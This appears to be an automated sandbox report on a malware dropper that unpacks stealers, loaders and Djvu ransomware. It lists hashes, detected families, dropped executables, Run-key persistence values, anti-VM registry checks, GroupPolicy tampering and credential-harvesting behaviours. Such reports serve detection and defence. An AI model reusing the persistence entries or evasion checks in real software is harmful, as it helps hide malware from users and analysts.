C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe

MD5 eede39c7c0198e86a3b75d2b8af77201
SHA1 b4545ddfbf9a70674a3f28aafe7abf7b4828b9f1
SHA256 7d61b2faaa4ca4c6a3ace89ab8a514c1d928492f4e41552b0386ccf7506d6727
SHA512 31698efaf32fca4bacbf7eef3c51b1db1350ea6768c498e859feea0dc610b3fdce8f5f1691279807088aa0a94eb61578bc6082840312dd17f8910ba7dd6f240d

\Users\Admin\AppData\Local\Temp\IXP002.TMP\cu2Lz27.exe

MD5 84e9449c56dfa124d9122f055727b670
SHA1 f575927558c1274cb63ae74ea6af4b0420080e32
SHA256 6cfc41d93b8ae9f3e579ce04426a2ca51ba158944331a97ff5c7c1a2f4f00c43
SHA512 e2e8058f4fccc8bd379a5755d300b2d715bf6b2fb23dc277d825a4c5ddd594dfef0d4cea63ed440e8d62423163d6af73a09c6dfecb9e5fa35edc94aa838e10cb

Analysis: behavioral2

Detonation Overview

Submitted: 2023-10-17 06:58

Reported: 2023-10-17 07:23

Platform: win10v2004-20230915-en

Max time kernel: 514s

Max time network: 597s

Command Line

C:\Windows\system32\lsass.exe

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat

Detected Djvu ransomware

Djvu Ransomware

ransomware djvu

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

RisePro

stealer risepro

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

Finds standalone samples of Amadey based on characteristic strings

amadey_qbo
Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | N/A | N/A

Renames multiple (169) files with added filename extension

ransomware

Downloads MZ/PE file

Stops running service(s)

evasion

.NET Reactor protector

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | N/A | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | N/A | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk | C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\Pictures\Minor Policy\78mCmut1q31KKLEjZwPM_IRi.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Minor Policy\SWE1hAZdlhK298cTBGrRTAJb.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Minor Policy\GYEKGY13K8dTfwFO8xyTbSdv.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Minor Policy\R6H5DbUMUEorruAu4jSA9yKu.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Minor Policy\9SLvu92aauFEE9PwBtgW5f7X.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Minor Policy\1K4bTXJtjSJzT8f0Aii8L_sT.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1LY72dM9.exe | N/A
N/A | N/A | C:\Windows\System32\smss.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Minor Policy\ngUAbeTU_97fB85wK7a56Jib.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\orm6k3UPjyk7pHiE6lmOcRAp.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5D01.exe | N/A

Loads dropped DLL

Modifies file permissions

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
VMProtect packed file

vmprotect
Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe | N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\\xXyQiNG_qhmki3RUDDNIRPh8.exe\" --AutoStart" | C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" | C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe | N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ipinfo.io | N/A | N/A
N/A | api.myip.com | N/A | N/A
N/A | api.2ip.ua | N/A | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A
File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A
File opened for modification | C:\Windows\SysWOW64\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe | N/A
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A
File opened for modification | C:\Windows\System32\GroupPolicy | N/A | N/A
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe | N/A
File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A
File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe | N/A
File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe | N/A
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | N/A | N/A
File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | N/A | N/A
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | N/A | N/A
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | N/A | N/A
File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\Pictures\Minor Policy\ngUAbeTU_97fB85wK7a56Jib.exe | N/A
File created | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | N/A | N/A

Launches sc.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\sc.exe | N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe N/A
N/A N/A C:\Windows\system32\sihost.exe N/A
N/A N/A C:\Windows\system32\sihost.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\ngUAbeTU_97fB85wK7a56Jib.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\ngUAbeTU_97fB85wK7a56Jib.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe N/A
N/A N/A C:\Users\Admin\Pictures\Minor Policy\ngUAbeTU_97fB85wK7a56Jib.exe N/A

Suspicious behavior: LoadsDriver


Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1LY72dM9.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\sihost.exe N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\smss.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\smss.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\smss.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeTakeOwnershipPrivilege N/A N/A N/A
Token: SeLoadDriverPrivilege N/A N/A N/A
Token: SeSystemProfilePrivilege N/A N/A N/A
Token: SeSystemtimePrivilege N/A N/A N/A
Token: SeProfSingleProcessPrivilege N/A N/A N/A
Token: SeIncBasePriorityPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeSystemEnvironmentPrivilege N/A N/A N/A
Token: SeRemoteShutdownPrivilege N/A N/A N/A
Token: SeUndockPrivilege N/A N/A N/A
Token: SeManageVolumePrivilege N/A N/A N/A
Token: 33 N/A N/A N/A
Token: 34 N/A N/A N/A
Token: 35 N/A N/A N/A
Token: 36 N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\smss.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\smss.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeTakeOwnershipPrivilege N/A N/A N/A
Token: SeLoadDriverPrivilege N/A N/A N/A
Token: SeSystemProfilePrivilege N/A N/A N/A
Token: SeSystemtimePrivilege N/A N/A N/A
Token: SeProfSingleProcessPrivilege N/A N/A N/A
Token: SeIncBasePriorityPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4360 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\GYEKGY13K8dTfwFO8xyTbSdv.exe
PID 4360 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\GYEKGY13K8dTfwFO8xyTbSdv.exe
PID 4360 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe
PID 4360 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe
PID 4360 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe
PID 4360 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\78mCmut1q31KKLEjZwPM_IRi.exe
PID 4360 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\78mCmut1q31KKLEjZwPM_IRi.exe
PID 4360 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\78mCmut1q31KKLEjZwPM_IRi.exe
PID 4360 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\SWE1hAZdlhK298cTBGrRTAJb.exe
PID 4360 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\SWE1hAZdlhK298cTBGrRTAJb.exe
PID 4360 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\SWE1hAZdlhK298cTBGrRTAJb.exe
PID 4360 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\GYEKGY13K8dTfwFO8xyTbSdv.exe
PID 4360 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\R6H5DbUMUEorruAu4jSA9yKu.exe
PID 4360 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\R6H5DbUMUEorruAu4jSA9yKu.exe
PID 4360 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe
PID 4360 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe
PID 4360 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe
PID 4360 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe
PID 4360 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe
PID 4360 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe
PID 4360 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\9SLvu92aauFEE9PwBtgW5f7X.exe
PID 4360 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\9SLvu92aauFEE9PwBtgW5f7X.exe
PID 4360 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\9SLvu92aauFEE9PwBtgW5f7X.exe
PID 4360 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 4360 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 4360 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 4360 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe
PID 4360 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe
PID 4360 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe
PID 4360 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\1K4bTXJtjSJzT8f0Aii8L_sT.exe
PID 4360 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\1K4bTXJtjSJzT8f0Aii8L_sT.exe
PID 4360 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\1K4bTXJtjSJzT8f0Aii8L_sT.exe
PID 4860 wrote to memory of 2864 N/A C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe
